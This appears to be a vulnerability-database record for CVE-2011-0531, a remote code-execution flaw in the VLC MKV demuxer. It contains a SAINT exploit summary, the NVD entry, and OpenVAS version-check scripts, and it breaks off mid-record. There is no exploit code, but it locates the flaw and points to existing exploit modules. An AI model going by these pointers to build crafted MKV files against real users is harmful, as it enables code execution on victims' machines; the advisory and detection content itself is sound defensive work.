Background
VLC media player is a media player supporting various audio and video formats for multiple platforms.
Problem
VideoLAN VLC 1.1.6.1 and earlier are vulnerable to remote code execution as a result of insufficient input validation. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted **MKV** (**Matroska** or **WebM**) file.
Resolution
Upgrade to VLC media player 1.1.7 or higher. Patches for some older versions are also available.
References
<http://www.videolan.org/security/sa1102.html>
Limitations
Exploit works on VideoLAN VLC 1.1.0.
The user must open the exploit file on the target with a vulnerable version of VLC.
Platforms
Windows
{"type": "saint", "edition": 2, "title": "VideoLAN VLC Media Player MKV Demuxer Code Execution", "references": [], "published": "2011-06-27T00:00:00", "lastseen": "2019-05-29T17:19:52", "description": "Added: 06/27/2011 \nCVE: [CVE-2011-0531](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0531>) \nBID: [46060](<http://www.securityfocus.com/bid/46060>) \nOSVDB: [70698](<http://www.osvdb.org/70698>) \n\n\n### Background\n\n[VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVideoLan VLC 1.1.6.1 and earlier are vulnerable to a remote code execution vulnerability as a result of insufficient input validation. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted `**MKV**` (`**Matroska**` or `**WebM**`) file. \n\n### Resolution\n\nUpgrade to VLC media player 1.1.7 or higher. Patches for some older versions are also available. \n\n### References\n\n<http://www.videolan.org/security/sa1102.html> \n\n\n### Limitations\n\nExploit works on VideoLAN VLC 1.1.0. \n\nThe user must open the exploit file on the target with a vulnerable version of VLC. 
\n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "viewCount": 5, "modified": "2011-06-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/vlc_mkv_demuxer", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-0531"]}, {"type": "nessus", "idList": ["VLC_1_1_7.NASL", "GENTOO_GLSA-201411-01.NASL", "DEBIAN_DSA-2211.NASL", "DEBIAN_DSA-2159.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:68956", "OPENVAS:68993", "OPENVAS:902340", "OPENVAS:1361412562310902339", "OPENVAS:1361412562310902340", "OPENVAS:136141256231068993", "OPENVAS:69555", "OPENVAS:136141256231068956", "OPENVAS:902339", "OPENVAS:136141256231069555"]}, {"type": "exploitdb", "idList": ["EDB-ID:16637"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/VLC_WEBM"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11425", "SECURITYVULNS:DOC:25701"]}, {"type": "saint", "idList": ["SAINT:FC3F8691377F5D2858A8DBCB8503CA3B", "SAINT:406E0DD61EF13D202107AAD34919B826"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2159-1:3FC9F", "DEBIAN:DSA-2211-1:256DF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:98119"]}, {"type": "gentoo", "idList": ["GLSA-201411-01"]}], "modified": "2019-05-29T17:19:52", "rev": 2}, "score": {"value": 8.4, "vector": "NONE", "modified": "2019-05-29T17:19:52", "rev": 2}, "vulnersScore": 8.4}, "cvelist": ["CVE-2011-0531"], "id": "SAINT:247793ED4A5F81141085F5CFD69DF3F9", "bulletinFamily": "exploit", "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:39:04", "description": "demux/mkv/mkv.hpp in the MKV demuxer plugin in VideoLAN VLC media player 1.1.6.1 and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary commands via a crafted MKV (WebM or Matroska) file that triggers memory corruption, related to \"class mismatching\" and the MKV_IS_ID macro.", "edition": 5, "cvss3": {}, "published": "2011-02-07T21:00:00", "title": "CVE-2011-0531", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0531"], "modified": "2017-09-19T01:32:00", "cpe": ["cpe:/a:videolan:vlc_media_player:1.0.5", "cpe:/a:videolan:vlc_media_player:0.9.9", "cpe:/a:videolan:vlc_media_player:1.0.4", "cpe:/a:videolan:vlc_media_player:1.1.3", "cpe:/a:videolan:vlc_media_player:0.1.99i", "cpe:/a:videolan:vlc_media_player:0.2.91", "cpe:/a:videolan:vlc_media_player:0.6.0", "cpe:/a:videolan:vlc_media_player:0.8.4", "cpe:/a:videolan:vlc_media_player:0.2.92", "cpe:/a:videolan:vlc_media_player:0.2.73", "cpe:/a:videolan:vlc_media_player:1.0.3", "cpe:/a:videolan:vlc_media_player:0.2.60", "cpe:/a:videolan:vlc_media_player:0.9.4", "cpe:/a:videolan:vlc_media_player:0.1.99e", "cpe:/a:videolan:vlc_media_player:0.4.1", "cpe:/a:videolan:vlc_media_player:0.9.3", "cpe:/a:videolan:vlc_media_player:0.8.1", "cpe:/a:videolan:vlc_media_player:0.1.99b", "cpe:/a:videolan:vlc_media_player:0.7.0", "cpe:/a:videolan:vlc_media_player:0.9.5", "cpe:/a:videolan:vlc_media_player:0.2.62", 
"cpe:/a:videolan:vlc_media_player:0.8.2", "cpe:/a:videolan:vlc_media_player:0.8.5", "cpe:/a:videolan:vlc_media_player:1.0.0", "cpe:/a:videolan:vlc_media_player:0.4.5", "cpe:/a:videolan:vlc_media_player:0.7.2", "cpe:/a:videolan:vlc_media_player:1.1.1", "cpe:/a:videolan:vlc_media_player:0.4.3", "cpe:/a:videolan:vlc_media_player:1.1.4", "cpe:/a:videolan:vlc_media_player:0.2.82", "cpe:/a:videolan:vlc_media_player:0.4.2", "cpe:/a:videolan:vlc_media_player:0.2.80", "cpe:/a:videolan:vlc_media_player:0.2.70", "cpe:/a:videolan:vlc_media_player:0.3.0", "cpe:/a:videolan:vlc_media_player:0.2.61", "cpe:/a:videolan:vlc_media_player:0.2.90", "cpe:/a:videolan:vlc_media_player:0.3.1", "cpe:/a:videolan:vlc_media_player:0.2.72", "cpe:/a:videolan:vlc_media_player:1.1.6", "cpe:/a:videolan:vlc_media_player:0.8.6", "cpe:/a:videolan:vlc_media_player:0.2.63", "cpe:/a:videolan:vlc_media_player:0.1.99h", "cpe:/a:videolan:vlc_media_player:0.1.99g", "cpe:/a:videolan:vlc_media_player:1.0.2", "cpe:/a:videolan:vlc_media_player:0.4.0", "cpe:/a:videolan:vlc_media_player:1.0.1", "cpe:/a:videolan:vlc_media_player:1.1.6.1", "cpe:/a:videolan:vlc_media_player:0.4.4", "cpe:/a:videolan:vlc_media_player:1.1.0", "cpe:/a:videolan:vlc_media_player:0.5.2", "cpe:/a:videolan:vlc_media_player:0.4.6", "cpe:/a:videolan:vlc_media_player:0.6.2", "cpe:/a:videolan:vlc_media_player:0.9.10", "cpe:/a:videolan:vlc_media_player:0.9.2", "cpe:/a:videolan:vlc_media_player:0.2.0", "cpe:/a:videolan:vlc_media_player:0.6.1", "cpe:/a:videolan:vlc_media_player:0.5.1", "cpe:/a:videolan:vlc_media_player:0.5.3", "cpe:/a:videolan:vlc_media_player:0.8.0", "cpe:/a:videolan:vlc_media_player:0.5.0", "cpe:/a:videolan:vlc_media_player:0.1.99f", "cpe:/a:videolan:vlc_media_player:0.2.71", "cpe:/a:videolan:vlc_media_player:1.1.5", "cpe:/a:videolan:vlc_media_player:0.9.8a", "cpe:/a:videolan:vlc_media_player:0.2.83", "cpe:/a:videolan:vlc_media_player:0.2.81", "cpe:/a:videolan:vlc_media_player:0.9.6", "cpe:/a:videolan:vlc_media_player:1.1.2", 
"cpe:/a:videolan:vlc_media_player:1.0.6"], "id": "CVE-2011-0531", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0531", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:videolan:vlc_media_player:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.81:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.71:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.92:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.83:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.8a:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.10:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.60:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.72:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.4:*:*:*:*:*:*:*", 
"cpe:2.3:a:videolan:vlc_media_player:0.2.73:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.82:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.90:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99g:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.91:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.70:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99e:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.61:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.80:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.62:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99b:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99h:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:videolan:vlc_media_player:0.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99f:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.2.63:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:0.1.99i:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-04-27T19:22:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.", "modified": "2020-04-23T00:00:00", "published": "2011-02-23T00:00:00", "id": "OPENVAS:1361412562310902339", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902339", "type": "openvas", "title": "VLC Media Player '.mkv' Code Execution Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VLC Media Player '.mkv' Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902339\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"VLC Media Player '.mkv' Code Execution Vulnerability (Linux)\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/65045\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1025018\");\n\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vlc_media_player_detect_lin.nasl\");\n script_mandatory_keys(\"VLCPlayer/Lin/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a specially crafted MKV file.\");\n script_tag(name:\"affected\", value:\"VLC media player version 1.1.6.1 and prior on Linux\");\n script_tag(name:\"insight\", value:\"The flaw is due to an input validation error within the 'MKV_IS_ID'\n macro in 'modules/demux/mkv/mkv.hpp' of the MKV demuxer, when parsing the\n MKV file.\");\n script_tag(name:\"solution\", value:\"Upgrade to the VLC media player version 1.1.7 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with VLC Media Player and is prone 
to\n arbitrary code execution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://download.videolan.org/pub/videolan/vlc/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nvlcVer = get_kb_item(\"VLCPlayer/Lin/Ver\");\nif(!vlcVer){\n exit(0);\n}\n\nif(version_is_less(version:vlcVer, test_version:\"1.1.7\")){\n report = report_fixed_ver(installed_version:vlcVer, fixed_version:\"1.1.7\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.", "modified": "2019-05-17T00:00:00", "published": "2011-02-23T00:00:00", "id": "OPENVAS:1361412562310902340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902340", "type": "openvas", "title": "VLC Media Player '.mkv' Code Execution Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VLC Media Player '.mkv' Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902340\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"VLC Media Player '.mkv' Code Execution Vulnerability (Windows)\");\n\n\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vlc_media_player_detect_win.nasl\");\n script_mandatory_keys(\"VLCPlayer/Win/Installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a specially crafted MKV file.\");\n script_tag(name:\"affected\", value:\"VLC media player version 1.1.6.1 and prior on Windows\");\n script_tag(name:\"insight\", value:\"The flaw is due to an input validation error within the 'MKV_IS_ID'\n macro in 'modules/demux/mkv/mkv.hpp' of the MKV demuxer, when parsing the\n MKV file.\");\n script_tag(name:\"solution\", value:\"Upgrade to the VLC media player version 1.1.7 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/65045\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1025018\");\n script_xref(name:\"URL\", value:\"http://download.videolan.org/pub/videolan/vlc/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"1.1.7\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"1.1.7\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:13:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-02-25T00:00:00", "published": "2011-03-05T00:00:00", "id": "OPENVAS:68956", "href": "http://plugins.openvas.org/nasl.php?oid=68956", "type": "openvas", "title": "FreeBSD Ports: vlc", "sourceData": "#\n#VID f9258873-2ee2-11e0-afcd-0015f2db7bde\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID f9258873-2ee2-11e0-afcd-0015f2db7bde\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: vlc\n\n=====\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.videolan.org/security/sa1102.html\nhttp://www.vuxml.org/freebsd/f9258873-2ee2-11e0-afcd-0015f2db7bde.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(68956);\n script_version(\"$Revision: 5424 $\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-05 22:25:39 +0100 (Sat, 05 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: vlc\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"vlc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.7\")<0) {\n txt += 'Package vlc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:28:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.", "modified": "2017-12-19T00:00:00", "published": "2011-02-23T00:00:00", "id": "OPENVAS:902340", "href": "http://plugins.openvas.org/nasl.php?oid=902340", "type": "openvas", "title": "VLC Media Player '.mkv' Code Execution Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_vlc_media_player_code_exec_vuln_win.nasl 8174 2017-12-19 12:23:25Z cfischer $\n#\n# VLC Media Player '.mkv' Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a specially crafted MKV file.\n Impact Level: Application\";\ntag_affected = \"VLC media player version 1.1.6.1 and prior on Windows\";\ntag_insight = \"The flaw is due to an input validation error within the 'MKV_IS_ID'\n macro in 'modules/demux/mkv/mkv.hpp' of the MKV demuxer, when parsing the\n MKV file.\";\ntag_solution = \"Upgrade to the VLC media player version 1.1.7 or later,\n For updates refer to http://download.videolan.org/pub/videolan/vlc/\";\ntag_summary = \"The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.\";\n\nif(description)\n{\n script_id(902340);\n script_version(\"$Revision: 8174 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 13:23:25 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"VLC Media Player '.mkv' Code Execution Vulnerability (Windows)\");\n\n\n script_copyright(\"Copyright (c) 2011 
SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vlc_media_player_detect_win.nasl\");\n script_mandatory_keys(\"VLCPlayer/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/65045\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1025018\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n## Check for VLC Media Player Version less than 1.1.7\nif( version_is_less( version:vers, test_version:\"1.1.7\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"1.1.7\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-04T14:20:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.", "modified": "2017-08-30T00:00:00", "published": "2011-02-23T00:00:00", "id": "OPENVAS:902339", "href": "http://plugins.openvas.org/nasl.php?oid=902339", "type": "openvas", "title": "VLC Media Player '.mkv' Code Execution Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: 
